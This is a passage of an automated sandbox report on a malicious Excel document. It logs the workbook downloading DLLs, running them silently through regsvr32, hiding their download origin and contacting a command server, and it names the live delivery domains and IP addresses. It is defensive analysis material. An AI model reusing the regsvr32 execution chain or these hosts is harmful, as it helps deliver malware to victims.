                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AVQhDTOoTQ\JuebGslFXTeyRNG.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocx
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IWJyiUbrMYkKNab\HrQqTfHWMtY.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocx
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr1.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr2.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr3.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\System32\regsvr32.exe /S ..\uxevr4.ocxJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PlMfP\OpoHHoBHS.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AVQhDTOoTQ\JuebGslFXTeyRNG.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IWJyiUbrMYkKNab\HrQqTfHWMtY.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVR56A7.tmpJump to behavior
                      Source: classification engineClassification label: mal100.troj.expl.evad.winXLS@16/17@4/5
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
                      Source: Scan 2022.20.05_0910.xlsOLE indicator, Workbook stream: true
                      Source: Scan 2022.20.05_0910.xls.0.drOLE indicator, Workbook stream: true
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180006F2C CloseHandle,Process32FirstW,CreateToolhelp32Snapshot,Process32NextW,4_2_0000000180006F2C
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Scan 2022.20.05_0910.xlsInitial sample: OLE indicators vbamacros = False
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000C892 push ebp; retf 3_2_000000018000C895
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D095 push B3B8007Eh; iretd 3_2_000000018000D09A
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D0F3 push ebp; iretd 3_2_000000018000D0F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_0000000180013551 push ebx; retf 3_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000D15D push ebx; retn 0068h3_2_000000018000D15E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000CDA8 push ebp; iretd 3_2_000000018000CDA9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000000018000CE36 push 458B0086h; iretd 3_2_000000018000CE3B
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_0000000180013551 push ebx; retf 4_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000C892 push ebp; retf 5_2_000000018000C895
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D095 push B3B8007Eh; iretd 5_2_000000018000D09A
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D0F3 push ebp; iretd 5_2_000000018000D0F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_0000000180013551 push ebx; retf 5_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000D15D push ebx; retn 0068h5_2_000000018000D15E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000CDA8 push ebp; iretd 5_2_000000018000CDA9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000000018000CE36 push 458B0086h; iretd 5_2_000000018000CE3B
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_0000000180013551 push ebx; retf 7_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000C892 push ebp; retf 8_2_000000018000C895
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000D095 push B3B8007Eh; iretd 8_2_000000018000D09A
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000D0F3 push ebp; iretd 8_2_000000018000D0F4
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_0000000180013551 push ebx; retf 8_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000D15D push ebx; retn 0068h8_2_000000018000D15E
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000CDA8 push ebp; iretd 8_2_000000018000CDA9
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000000018000CE36 push 458B0086h; iretd 8_2_000000018000CE3B
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_0000000180013551 push ebx; retf 9_2_0000000180013559
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_000007FEF9D30CC0
                      Source: uxevr1.ocx.0.drStatic PE information: real checksum: 0x654f5 should be: 0x67d8e
                      Source: uxevr3.ocx.0.drStatic PE information: real checksum: 0x654f5 should be: 0x6165e
                      Source: uxevr2.ocx.0.drStatic PE information: real checksum: 0x654f5 should be: 0x61d00
                      Source: f6TC4C6PwMWzjYykKV327CT8vWcYjtGvLL[1].dll.0.drStatic PE information: real checksum: 0x654f5 should be: 0x6165e
                      Source: Cmk1Nr[1].dll.0.drStatic PE information: real checksum: 0x654f5 should be: 0x67d8e
                      Source: xqJfpnc0wEmcroPdpB[1].dll.0.drStatic PE information: real checksum: 0x654f5 should be: 0x61d00
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PlMfP\OpoHHoBHS.dll"
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Cmk1Nr[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\AVQhDTOoTQ\JuebGslFXTeyRNG.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\PlMfP\OpoHHoBHS.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\IWJyiUbrMYkKNab\HrQqTfHWMtY.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\f6TC4C6PwMWzjYykKV327CT8vWcYjtGvLL[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xqJfpnc0wEmcroPdpB[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\AVQhDTOoTQ\JuebGslFXTeyRNG.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\PlMfP\OpoHHoBHS.dll (copy)Jump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeFile created: C:\Windows\System32\IWJyiUbrMYkKNab\HrQqTfHWMtY.dll (copy)Jump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr1.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr3.ocxJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\uxevr2.ocxJump to dropped file

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\PlMfP\OpoHHoBHS.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\AVQhDTOoTQ\JuebGslFXTeyRNG.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile opened: C:\Windows\system32\IWJyiUbrMYkKNab\HrQqTfHWMtY.dll:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2520Thread sleep time: -240000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2728Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2944Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 3044Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 2536Thread sleep time: -120000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exe TID: 1988Thread sleep time: -60000s >= -30000sJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeEvasive API call chain: GetModuleFileName,DecisionNodes,ExitProcessgraph_3-16410
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\Cmk1Nr[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\f6TC4C6PwMWzjYykKV327CT8vWcYjtGvLL[1].dllJump to dropped file
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\xqJfpnc0wEmcroPdpB[1].dllJump to dropped file
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.2 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 8.2 %
                      Source: C:\Windows\System32\regsvr32.exeAPI coverage: 7.3 %
                      Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 4_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,4_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 7_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,7_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 9_2_00000001800248B0 FindFirstFileW,FindNextFileW,FindClose,9_2_00000001800248B0
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-16412
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-16517
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_5-16464
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_5-16668
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeAPI call chain: ExitProcess graph end node
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000007FEF9D23280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30215 _itow_s,_invoke_watson_if_error,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,OutputDebugStringW,_wcsftime_l,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_invoke_watson_if_error,_snwprintf_s,_invoke_watson_if_oneof,_invoke_watson_if_error,_invoke_watson_if_oneof,_invoke_watson_if_error,_unlock,GetFileType,WriteConsoleW,GetLastError,_invoke_watson_if_oneof,WriteFile,WriteFile,OutputDebugStringW,_itow_s,_invoke_watson_if_error,3_2_000007FEF9D30215
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D30CC0 LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,3_2_000007FEF9D30CC0
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D23280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_000007FEF9D23280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D2BE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_000007FEF9D2BE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74F3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,5_2_000007FEF74F3280
                      Source: C:\Windows\System32\regsvr32.exeCode function: 5_2_000007FEF74FBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,5_2_000007FEF74FBE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000007FEF70CBE50 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,8_2_000007FEF70CBE50
                      Source: C:\Windows\System32\regsvr32.exeCode function: 8_2_000007FEF70C3280 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,8_2_000007FEF70C3280

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 173.82.82.196 8080Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\PlMfP\OpoHHoBHS.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\AVQhDTOoTQ\JuebGslFXTeyRNG.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\System32\regsvr32.exe C:\Windows\system32\regsvr32.exe "C:\Windows\system32\IWJyiUbrMYkKNab\HrQqTfHWMtY.dll"Jump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D28900 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,3_2_000007FEF9D28900
                      Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_000007FEF9D28860 HeapCreate,GetVersion,HeapSetInformation,3_2_000007FEF9D28860

                      Stealing of Sensitive Information

                      barindex
                      Source: Yara matchFile source: 3.2.regsvr32.exe.3e0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.510000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.140000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.3c0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.160000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 9.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 8.2.regsvr32.exe.3c0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.regsvr32.exe.3e0000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 5.2.regsvr32.exe.140000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 4.2.regsvr32.exe.160000.0.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 7.2.regsvr32.exe.510000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000005.00000002.919789550.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.914603769.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1248680431.0000000000160000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000004.00000002.1249251446.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.930405356.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000005.00000002.919412326.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1249191933.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1248874495.0000000000510000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.914158918.00000000003E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000008.00000002.930201138.00000000003C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000009.00000002.1248687990.0000000000140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000007.00000002.1249180337.0000000180001000.00000020.00001000.00020000.00000000.sdmp, type: MEMORY
                      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
                      Valid Accounts2
                      Scripting
                      Path Interception111
                      Process Injection
                      131
                      Masquerading
                      OS Credential Dumping1
                      System Time Discovery
                      Remote Services1
                      Archive Collected Data
                      Exfiltration Over Other Network Medium11
                      Encrypted Channel
                      Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
                      Default Accounts2
                      Native API
                      Boot or Logon Initialization ScriptsBoot or Logon Initialization Scripts1
                      Disable or Modify Tools
                      LSASS Memory1
                      Query Registry
                      Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth1
                      Non-Standard Port
                      Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
                      Domain Accounts43
                      Exploitation for Client Execution
                      Logon Script (Windows)Logon Script (Windows)1
                      Virtualization/Sandbox Evasion
                      Security Account Manager12
                      Security Software Discovery
                      SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration13
                      Ingress Tool Transfer
                      Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
                      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)111
                      Process Injection
                      NTDS1
                      Virtualization/Sandbox Evasion
                      Distributed Component Object ModelInput CaptureScheduled Transfer2
                      Non-Application Layer Protocol
                      SIM Card SwapCarrier Billing Fraud
                      Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
                      Deobfuscate/Decode Files or Information
                      LSA Secrets2
                      Process Discovery
                      SSHKeyloggingData Transfer Size Limits23
                      Application Layer Protocol
                      Manipulate Device CommunicationManipulate App Store Rankings or Ratings
                      Replication Through Removable MediaLaunchdRc.commonRc.common2
                      Scripting
                      Cached Domain Credentials1
                      Remote System Discovery
                      VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
                      External Remote ServicesScheduled TaskStartup ItemsStartup Items1
                      Hidden Files and Directories
                      DCSync2
                      File and Directory Discovery
                      Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
                      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job2
                      Obfuscated Files or Information
                      Proc Filesystem16
                      System Information Discovery
                      Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
                      Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
                      Regsvr32
                      /etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
                      Hide Legend

                      Legend:

                      • Process
                      • Signature
                      • Created File
                      • DNS/IP Info
                      • Is Dropped
                      • Is Windows Process
                      • Number of created Registry Values
                      • Number of created Files
                      • Visual Basic
                      • Delphi
                      • Java
                      • .Net C# or VB.NET
                      • C, C++ or other language
                      • Is malicious
                      • Internet
                      behaviorgraph top1 signatures2 2 Behavior Graph ID: 632106 Sample: Scan 2022.20.05_0910.xls Startdate: 23/05/2022 Architecture: WINDOWS Score: 100 54 Multi AV Scanner detection for domain / URL 2->54 56 Antivirus detection for URL or domain 2->56 58 Multi AV Scanner detection for dropped file 2->58 60 10 other signatures 2->60 7 EXCEL.EXE 53 27 2->7         started        12 svchost.exe 2->12         started        process3 dnsIp4 46 kuluckaci.com 185.86.13.242, 49174, 80 IDEALHOSTINGTR Turkey 7->46 48 microlent.com 103.195.4.8, 443, 49173 KAMATERAINC-AS-APKamateraIncHK Hong Kong 7->48 50 2 other IPs or domains 7->50 32 C:\Users\user\uxevr3.ocx, PE32+ 7->32 dropped 34 C:\Users\user\uxevr2.ocx, PE32+ 7->34 dropped 36 C:\Users\user\uxevr1.ocx, PE32+ 7->36 dropped 38 4 other malicious files 7->38 dropped 64 Document exploit detected (creates forbidden files) 7->64 66 Document exploit detected (UrlDownloadToFile) 7->66 14 regsvr32.exe 2 7->14         started        18 regsvr32.exe 2 7->18         started        20 regsvr32.exe 2 7->20         started        22 regsvr32.exe 7->22         started        file5 signatures6 process7 file8 40 C:\Windows\...\HrQqTfHWMtY.dll (copy), PE32+ 14->40 dropped 68 Hides that the sample has been downloaded from the Internet (zone.identifier) 14->68 24 regsvr32.exe 14->24         started        42 C:\Windows\System32\...\OpoHHoBHS.dll (copy), PE32+ 18->42 dropped 27 regsvr32.exe 2 18->27         started        44 C:\Windows\...\JuebGslFXTeyRNG.dll (copy), PE32+ 20->44 dropped 30 regsvr32.exe 20->30         started        signatures9 process10 dnsIp11 62 System process connects to network (likely due to code injection or exploit) 24->62 52 173.82.82.196, 49177, 49179, 49180 MULTA-ASN1US United States 27->52 signatures12

                      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                      windows-stand
                      SourceDetectionScannerLabelLink
                      Scan 2022.20.05_0910.xls44%VirustotalBrowse
                      Scan 2022.20.05_0910.xls37%ReversingLabsDocument-Excel.Trojan.Abracadabra
                      SourceDetectionScannerLabelLink
